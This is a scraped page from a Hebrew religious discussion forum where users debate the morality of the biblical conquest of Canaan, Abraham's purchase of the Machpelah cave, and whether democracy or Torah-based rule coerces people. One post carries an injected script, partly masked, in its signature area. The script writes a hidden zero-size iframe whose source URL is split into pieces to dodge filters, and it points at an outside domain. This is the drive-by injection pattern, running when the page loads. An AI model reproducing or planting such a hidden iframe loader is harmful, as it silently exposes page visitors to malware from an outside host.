בית פורומים עצור כאן חושבים

לסטים אתם?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-21/6/2011 17:17 לינק ישיר 

הבה נחזור לנושא.

וברשוכתם, אני מבקש לחדד ולהבהיר מה הן השאלות.

קודם כל הנתונים:

לפי המקרא, עם ישראל חדר לארץ וכבש שטחים, הרס ערים והרג המון בני אדם.

לפי הפרשנות המקובלת אצלנו שצוטטה לעיל, המנהיג, יהושע, קדם והציע להם כניעה וקבלת מצוות או בריחה. הם דחו.

עכשו השאלה היא: האם זה היה מוצדק.

אמנם, ייתכן כתב שלא זו השאלה כי זה כבר עלה בדיון על בן המאה ה21 שנתקל בבעיה מוסרית בתורה. אני איני מבין מדוע. אפשר לדון פה ואפשר לדון שם. זה לא בדיוק אותו דבר.

עוד שאל ייתכן מה היינו עונים לכנעני.

אני כתבתי שיש כאן בעיה אמיתית. לפי הערכים שלנו כיבוש ארץ והשמדת עממים אלו פעולות אסורות. מאד.

איש ציפור (ואחרים מן הסתם, ואני בהסתייגות מסויימת) הציע שהתורה היא הטרונומית (=כפופה לנותן ולא לערכים) ולכן אין כאן שאלה.

כלומר, אין לצפות מהתורה למוסריות אלא אם כן נותן התורה רוצה בכך. ושם לא רצה. 

התירוץ הזה עונה על השאלה אבל הוא עולה בתג מחיר. המחיר הוא לוותר על המוסריות. למשל, האם אברהם אבינו, זה ששאל "השופט כל הארץ לא יעשה משפט", האם הוא היה מסכים להרוס את יריחו ולהרוג את הילדים שבה?

יש לשים לב שייתכנו כאן כמה כיווני תשובה שמעוררים שאלות אחרות:

1. מה עוד יכל עם ישראל לעשות כדי למצוא ארץ או להתיישב בארץ ישראל מעבר למה שנעשה בפועל, כלומר כיבוש ערים?

2. העממים היו חוטאים מבחינת אמונותיהם והנהגותיהם ולכן היו חייבים מיתה.

3. השארת עם ישראל בארץ ישראל לצד עממים היתה מדרדרת אותם, כפי שאכן קרה למרות השמדת חלק מהעממים (רק לדמיין מה היה קורה אילו היו מתערים בין היושבים בארץ).

היו נסיונות נוספים לתשובה:

4. הארץ היתה שייכת כל הזמן לעם ישראל, רק שהיושבים בה לא ידעו זאת. או אולי כן ידעו זאת והתעלמו מזה?

5. בעולם של אז, כיבוש בידי עם שמגיע מבחוץ לא נחשב לפסול.

6. אי אפשר היה לצפות מעם ישראל לבנות את עצמו בארץ ישראל בלי לפעול בכוח עד השמדה נגד העממים. לפעמים המטרה מחייבת אמצעים כאלו או אחרים, גם אם הם נראים קשים.

(האם תשובות אלו עונות על השאלה? ושוב: מה היתה השאלה?).

שותף סוד

טול חופן איקונים ירוקים על תשובתך המופלאה שאתה נתת ונותן את חייך, וחיי ילדיך, על אמונתך ביהדות. יש בינינו חילוקי דעות רבים ויסודיים, אבל בדבר הזה אני מסכים איתך ויכול רק להתפעל ממך.

איש ציפור

מי שרוצה לענות לשאלותיו של ייתכן צריך להתאמץ. לשלוח אותו בחזרה לחיידר בלי לציין לאיזו כיתה ולאיזה שיעור ומה ילמדו שם - קשה לראות בכך תשובה. אולי זה נסיון לסתימת פיות. כך זה בעיני הצופה מן הצד, כמוני. ואני דווקא כן מחפש תשובה לשאלותיו של ייתכן. אני גם סבור שהוא רוצה תשובה וכואב לו שאין לו. (ואם זה כואב ואכפת לו, אז כבר הכל בסדר, כמו בסיפור על הרבי מקאצק שאני אוהב לצטט).

__________נוספו כמה מילות הבהרה_______

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 21/06/2011 17:18:25

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:27 לינק ישיר 

מעניין לראות שדווקא המקומות הקדושים ביותר לנו ובראשם מקום המקדש לא נכבשו אלא נקנו בכסף
מלא מידי הגויים שהחזיקו בהם.
כמו כן דוד לא בונה את בית המקדש בגלל שפיכות דמים 
מכאן שקיימת הסתייגות מכל הדם שנשפך למרות שהכל מוצדק והכל נעשה בציווי.

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:32 לינק ישיר 

איש,

מחמת אי הקפדתך על הפרדת כל טיעון לגופו קשה לי קצת להתייחס לכל הנאמר. אני מרשה לעצמי להתייחס לחלק מהדברים. אתייחס בשמחה לכל טיעון ברור וממוקד.

כתבת, זו כפיה תרבותית, בדיוק כמו זו שאתה ורבים אחרים מנסים להנחיל לנו בשם הדמוקרטיה הנאורות ועוד סיסמאות שנשמעות יפה בעינכם,

נניח שאני מסכים אתך. מה דעתך להפריד ולהבדיל בין "כפיה תרבותית" לבין "להנחיל" על ידי הסברה ואפילו תעמולה?

יש לך דוגמאות לכפיית ערכים בכוח על ידי בעלי תפיסה דמוקרטית הומניסטית?

אצלנו בחירה חופשית היא ערך שלא כמו אצלכם.

לדעתך, ציות עיוור לכתבי הקודש משקף בחירה חופשית יותר מהליכה אחר ההיגיון והשכל?

מקס,

דייר הזכירני כי אפילו קבר אברהם נאלץ לקנות מבני חת ואתה טוען כי הוא שלט על כל הארץ?

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:34 לינק ישיר 

מיימוני,
אנא אל תכניס לי מילים לפה. מעולם לא כתבתי שאין לצפות מהתורה למוסר. וגם לא שהתורה לא כפופה לערכים.
אדרבה בעיני התורה מסכמת את הערכים לכדי מכלול בצורה היותר שלימה שאפשר ומעצבת דרך חיים שלימה על פיהם.
לגבי החזרה לחומש, ניסחתי את הדברים על פי כללי צדק פשוטים שמעוגנים בגישה הפוליטית בין לאומית מאז ומעולם (השאלה הספיציפית של הרג הכנענים שהפסידו במלחמה לא הועלתה כאן באופן ישיר , אך פשוט שהיא הנורמה התרבותית המקובלת אז ובמובנים רבים גם היום) במפתיע או שלא זה גם שמופיע בחומש. זה שייתכן או אתה לא מקבלים ו/או לא מבינים את זה , זו אכן בעיה , מה אתה מצפה שאעשה בשבילכם , אעקם את המציאות ?
    אמציא תרבות פוליטית בין לאומית אחרת ?  או שאנסה להסביר שהמוסר שאתם מדברים בשמו לא מחזיק מים כשמדברים על מציאות בין לאומית אז והיום ? (ולא רק עליה)
לי הדרך השניה נראית נכונה , כי בסופו של דבר האמת מנצחת גם אם לאנשים קשה לקבל אותה כאן ועכשיו, וגם להליכה בדרכי שקר יש מחירים משלה.

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:35 לינק ישיר 

מיימוני כתב:

שותף סוד
טול חופן איקונים ירוקים על תשובתך המופלאה שאתה נתת ונותן את חייך, וחיי ילדיך, על אמונתך ביהדות. יש בינינו חילוקי דעות רבים ויסודיים, אבל בדבר הזה אני מסכים איתך ויכול רק להתפעל ממך.

זה לא הבנתי.
מילא אני פרייר ומאמין שהכל קדש קדשים, ולכן מוכן למסור נפשי על זה.
אבל אתה, שאוחז שחלק גדול מהראשונים והאחרונים הם מינים במקרה הגרוע או סתם חסרי דעת במקרה הטוב, מה לך למסור נפשך על תורתם המבולבלת ?!

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:50 לינק ישיר 

ייתכן כתב:
  מקס,

דייר הזכירני כי אפילו קבר אברהם נאלץ לקנות מבני חת ואתה טוען כי הוא שלט על כל הארץ?

צדיק עיין שם ותראה שאני צודק, (זה היית עניין של חסידות ותו לא, או רצה דווקא שדה של מישהו שישב שם,
המדינה גם לא יכולה לקחת ממני שדה ששייך לי)

והנה הפסוקים

בראשית פרק כג

(ד) גֵּר וְתוֹשָׁב אָנכִי עִמָּכֶם (עמכם עם = ביחד שווה, מה שאין אתכם, כלומר בני חת ואברהם הם גרים בארץ) תְּנוּ לִי אֲחֻזַּת קֶבֶר עִמָּכֶם וְאֶקְבְּרָה מֵתִי מִלְּפָנָי:
(ה) וַיַּעֲנוּ בְנֵי חֵת אֶת אַבְרָהָם לֵאמר לוֹ:
(ו) שְׁמָעֵנוּ אֲדנִי נְשִׂיא אֱלֹהִים אַתָּה בְּתוֹכֵנוּ בְּמִבְחַר קְבָרֵינוּ קְבֹר אֶת מֵתֶךָ אִישׁ מִמֶּנּוּ אֶת קִבְרוֹ לֹא יִכְלֶה מִמְּךָ מִקְּבֹר מֵתֶךָ:
(ז) וַיָּקָם אַבְרָהָם וַיִּשְׁתַּחוּ לְעַם הָאָרֶץ לִבְנֵי חֵת:
(ח) וַיְדַבֵּר אִתָּם לֵאמֹר אִם יֵשׁ אֶת נַפְשְׁכֶם לִקְבֹּר אֶת מֵתִי מִלְּפָנַי שְׁמָעוּנִי וּפִגְעוּ לִי בְּעֶפְרוֹן בֶּן צֹחַר:
(ט) וְיִתֶּן לִי אֶת מְעָרַת הַמַּכְפֵּלָה אֲשֶׁר לוֹ אֲשֶׁר בִּקְצֵה שָׂדֵהוּ בְּכֶסֶף מָלֵא יִתְּנֶנָּה לִי בְּתוֹכְכֶם לַאֲחֻזַּת קָבֶר:
(י) וְעֶפְרוֹן יֹשֵׁב בְּתוֹךְ בְּנֵי חֵת וַיַּעַן עֶפְרוֹן הַחִתִּי אֶת אַבְרָהָם בְּאָזְנֵי בְנֵי חֵת לְכֹל בָּאֵי שַׁעַר עִירוֹ לֵאמֹר:
(יא) לֹא אֲדֹנִי שְׁמָעֵנִי הַשָּׂדֶה נָתַתִּי לָךְ וְהַמְּעָרָה אֲשֶׁר בּוֹ לְךָ נְתַתִּיהָ לְעֵינֵי בְנֵי עַמִּי נְתַתִּיהָ לָּךְ קְבֹר מֵתֶךָ:
(יב) וַיִּשְׁתַּחוּ אַבְרָהָם לִפְנֵי עַם הָאָרֶץ:
(יג) וַיְדַבֵּר אֶל עֶפְרוֹן בְּאָזְנֵי עַם הָאָרֶץ לֵאמֹר אַךְ אִם אַתָּה לוּ שְׁמָעֵנִי נָתַתִּי כֶּסֶף הַשָּׂדֶה קַח מִמֶּנִּי וְאֶקְבְּרָה אֶת מֵתִי שָׁמָּה:
(יד) וַיַּעַן עֶפְרוֹן אֶת אַבְרָהָם לֵאמֹר לוֹ:
(טו) אֲדֹנִי שְׁמָעֵנִי אֶרֶץ אַרְבַּע מֵאֹת שֶׁקֶל כֶּסֶף בֵּינִי וּבֵינְךָ מַה הִוא וְאֶת מֵתְךָ קְבֹר: (אתה מתעקש ?! תן לי משהו סימלי שלא שווה לי ולך וקח לך את השדה)
(טז) וַיִּשְׁמַע אַבְרָהָם אֶל עֶפְרוֹן וַיִּשְׁקֹל אַבְרָהָם לְעֶפְרֹן אֶת הַכֶּסֶף אֲשֶׁר דִּבֶּר בְּאָזְנֵי בְנֵי חֵת אַרְבַּע מֵאוֹת שֶׁקֶל כֶּסֶף עֹבֵר לַסֹּחֵר:
(יז) וַיָּקָם שְׂדֵה עֶפְרוֹן אֲשֶׁר בַּמַּכְפֵּלָה אֲשֶׁר לִפְנֵי מַמְרֵא הַשָּׂדֶה וְהַמְּעָרָה אֲשֶׁר בּוֹ וְכָל הָעֵץ אֲשֶׁר בַּשָּׂדֶה אֲשֶׁר בְּכָל גְּבֻלוֹ סָבִיב:
(יח) לְאַבְרָהָם לְמִקְנָה לְעֵינֵי בְנֵי חֵת בְּכֹל בָּאֵי שַׁעַר עִירוֹ:
(יט) וְאַחֲרֵי כֵן קָבַר אַבְרָהָם אֶת שָׂרָה אִשְׁתּוֹ אֶל מְעָרַת שְׂדֵה הַמַּכְפֵּלָה עַל פְּנֵי מַמְרֵא הִוא חֶבְרוֹן בְּאֶרֶץ כְּנָעַן:
(כ) וַיָּקָם הַשָּׂדֶה וְהַמְּעָרָה אֲשֶׁר בּוֹ לְאַבְרָהָם לַאֲחֻזַּת קָבֶר מֵאֵת בְּנֵי חֵת: ס

עכשיו תלמד בעיון רב ותחשוב מה הולך כאן ?
למה הבני חת מיד עונים לו (לאברהם) תקח מה שבא לך,
ולמה אברהם לא מסתפק ומבקש את עפרון, בזמן שעפרון ישב שם ושמע שכל בני חת\ביתו נותנים לו והוא (עפרון) לא מוחה בהם כמנהיג שלהם,
וכן על זו הרדך,

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:51 לינק ישיר 

ייתכן,
1. הכפיה התרבותית היום נעשית בעיקר דרך התקשורת ובתי המשפט. (ע"ע המהפכה האקטיביסטית-נאורה של אהרן ברק) אם אתה מחפש כפיה בכח ממש הרי שהיא מצויה והרבה באגף המשפטי, אם כי הרוח התרבותית גורמת גם להשפעה בכח דרך התקשורת. (למשל דרך יציאה למסעי צלב נגד אדם בעל דעות "לא נכונות" בעיתונות בדר"כ תוך נקיטה בחצאי אמיתות במקרה הטוב שמוצגים באופן מניפולטיבי וכיו"ב.)
2. אני נגד ציות עיוור בכלל ולכתבי הקודש בפרט. כך שבענין הזה אתה כמתפרץ לדלת פתוחה.
                        בברכה.

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 17:57 לינק ישיר 

איש,

אני שותף לביקורתך על האקטיביזם השיפוטי ועל התנהגות התקשורת. האם זה אומר שהדמוקרטיה וההומניזם הם אידיאולוגיות הדוגלות בכפיה כפי שטענת?

האינך מבדיל בין לחץ חברתי, אגרסיבי ככל שיהיה, לבין כפיה בפועל?

טענת כי אתה מאמין בבחירה חופשית בשונה מההומניזם הליברלי. בפועל אתה דוגל במסגרת דתית ספציפית אותה אתה מגדיר כאמת, לעומת הדוגלים באיש באמונתו יחיה.

תוקן על ידי ייתכן ב- 21/06/2011 18:00:13

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:08 לינק ישיר 

ייתכן,
לא טענתי שהן דוגלות בכפיה, אמרתי שזה מה שהן עושות הלכה למעשה, וכך עושה כל תרבות שלטונית.
למעשה זה כל המשמעות של שלטון, שיש לה יכולת לכפות וכשלדעתה צריך היא כופה. ("דינא דמלכותא דינא" בלשון חכמים) ולכן כיון שגם התורה חפיצה לכונן תרבות שלטונית יש בה אלמנטים של כפיה, הן במסגרת בתי דין והן במסגרת המלכות (=השלטון) .
בכל מקרה אני *לא דוגל במסגרת דתית בכלל ובודאי שלא בכזו ספיציפית כך שהפעם אתה מתפרץ לדלת שכלל לא קיימת (לפחות בבית שלי...) אני דוגל בתרבות שלטונית על פי כללי התורה (דבר שלהבנתי הוא התכלית לשמה ניתנה התורה מלכתחילה) , כמו שלהבדיל ההמוניזם הליברלי דוגל, רק באופן ישר ברור וגלוי יותר, ולא בדרכים של אחד בפה ואחד בלב, וד"ל.

* כמובן אני לא מתנגד לקיומן של מסגרות דתיות כאלו ואחרות כל עוד הן עומדות בגבולות גזרה בסיסים.  

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:24 לינק ישיר 

איש,

כתבת, לא טענתי שהן דוגלות בכפיה, אמרתי שזה מה שהן עושות הלכה למעשה, וכך עושה כל תרבות שלטונית.

אני חוזר ושואל. אינך מבחין בין כפיה תרבותית לבין כפיה פיזית? בין דמוקרטיה לתיאוקרטיה?

למעשה זה כל המשמעות של שלטון, שיש לה יכולת לכפות וכשלדעתה צריך היא כופה. ("דינא דמלכותא דינא" בלשון חכמים) ולכן כיון שגם התורה חפצה לכונן תרבות שלטונית יש בה אלמנטים של כפיה, הן במסגרת בתי דין והן במסגרת המלכות (=השלטון) .

אפשר לקיים בחירות על הצורך להאמין בה' או לשמור את השבת או לקיים כל מצוה אחרת או שחייבים לומר נעשה ונשמע?

בכל מקרה אני *לא דוגל במסגרת דתית בכלל ובוודאי שלא בכזו ספציפית כך שהפעם אתה מתפרץ לדלת שכלל לא קיימת (לפחות בבית שלי...) אני דוגל בתרבות שלטונית על פי כללי התורה (דבר שלהבנתי הוא התכלית לשמה ניתנה התורה מלכתחילה)

הסבר בבקשה.

כמו שלהבדיל ההומניזם הליברלי דוגל,

ההומניזם הליברלי דוגל באיש באמונתו יחיה ובקיום מינימלי של סדר חברתי.

רק באופן ישר ברור וגלוי יותר,

דווקא אתה ממש לא ברור ולעתים נראה שאתה עושה מאמץ לערפל.

ולא בדרכים של אחד בפה ואחד בלב, וד"ל.

פרט נא את ה"וד"ל".

* כמובן אני לא מתנגד לקיומן של מסגרות דתיות כאלו ואחרות כל עוד הן עומדות בגבולות גזרה בסיסים. 

ברגע שאתה נוטל לעצמך את הסמכות לקבוע גבולות גזרה בסיסיים, אתה מתנגד לקיומן של מסגרות כאלה ואחרות החורגות ח"ו ממה שהנך קובע על דעתך כגבולות גזרה בסיסיים.

אינך דוגל בחופש הפרט? אתה לא לבד. לפחות אל תטען שאתה בעד בחירה חופשית ואילו הדוגלים בחופש הפרט אינם בעד בחירה חופשית.

תוקן על ידי ייתכן ב- 21/06/2011 18:35:14

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:24 לינק ישיר 

maxmen כתב:
  מקס,

לפעמים אני מתפלא עליך ייתכן הרי עפרון ממש התחנן לתת את המערה לאברהם ואברהם בנדיבות ליבו 
התעקש לקנות בכסף מלא זה ברור שהיה לו מעמד נכבד בקרב יושבי הארץ.
אתה מתחיל להדאיג אותי.....

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:33 לינק ישיר 

דייר,

מעולם לא טענתי כי אברהם לא היה איש נכבד.

האם זה אומר שהוא שלט על כל ארץ ישראל? במקרא ולא רק בפרשה זו לא משמע כן כלל וכלל.

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:39 לינק ישיר 

ייתכן, אני לא מבין אותך באשכול הזה כלל.
אתה מתפלפל מה כתוב ומה לא כתוב בספר זה או אחר. מה איכפת לך- ממילא הספרים דמיוניים ומספרים מה שהמחבר שלהם רוצה שתדע. האם אתה מנסה לנתח את העניין מבחינה ספרותית ?
האמת שלא יצאנו ממצרים ולא כבשנו את ארץ ישראל ולא גרשנו אף אחד מהארץ.
אנחנו בסה"כ חבורה של מבולבלים ומטושטשים שהתכנסנו לכאן מכל קצוות תבל תחת קריאתו של הרצל הדגול.

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:41 לינק ישיר 

ייתכן כתב:
  דייר,

מעולם לא טענתי כי אברהם לא היה איש נכבד.

האם זה אומר שהוא שלט על כל ארץ ישראל? במקרא ולא רק בפרשה זו לא משמע כן כלל וכלל.

צדיק כתוב שהוא כבש את כל הארץ, ותהיה לרגע חוקר מקרא אכזרי ותבין לומר שכבש כן וצדיק והחזיר לא מתקבל על הדעת( של החוקר האכזרי)

דדווח על תוכן פוגעני

נשלח ב-21/6/2011 18:44 לינק ישיר 

ייתכן,
1. התבלבלת בשמי. (אני לא זה המכונה דייר.)
2. למקרה שעדין לא הבנת אני טוען שהצעת התורה אינה תאוקרטיה כלל, אלא שלטון אזרחי עם תפיסה תרבותית מסוימת וכללי משפט וכד' בהתאם.
3. אין בחירות בנוגע לחילול שבת, מצד שני במצב בו רוב העם דה-פקטו לא שומר שבת, הדין הזה לא נאכף.
כמובן שבמסגרת ההשפעה התרבותית ששלטון כזה יחפוץ בה ,כן תהיה הכוונה לכך שהשבת כן תישמר ולמעשה תיגזר מכך (ומעוד עקרונות בתורה שקושרים לכלכה) התנהלות כלכלית שלימה.
4. כל ההודעה הזו היא הסבר לכך. מבחינתי כל ה"עדרים" הדתיים שנוצרו היום הם מציאות זמנית שגורמים לכך שהאמת נעדרת, ולכן טוב שאחותה הבכירה ,דהיינו שלטון לפי התורה שממנו ובהתאם לו מנוהלות הקבוצות השונות (וזה כולל כמובן גם קבוצות שמוגדרות כלא דתיות) יחליף אותה, ויפה שעה אחת קודם.
5. לא ממש, הוא גם כופה השקפות על הציבור באמצעות חקיקה,ואקטיביזם שיפוטי ודומני שכבר הסכמנו על זה.
6. או שזה אני או שזה אתה. שאלה של השקפה.
7. ד"ל נכתב כדי לא לפרט דברים שלא רוצים לפרט, אתה לא יודע ?
8.  כיון שגבולות הגזרה האלו הם בסדר גודל של "קיום מינימלי של סדר חברתי." אותם קיבלת בסעיף 5, כאשר מדובר בתרבות הליברלית, ואולי אף פחות מכך, הרי שזה לא אמור להוות גורם מעכב מבחינתך, או שיש לנו כאן הסבר מסוים בנוגע לסעיף 7... :-)
9. הסיסמא המסיימת דמגוגית ומנותקת מכל ההקשר .

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > לסטים אתם?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 7 8 9 ... 14 15 16 לדף הבא סך הכל 16 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.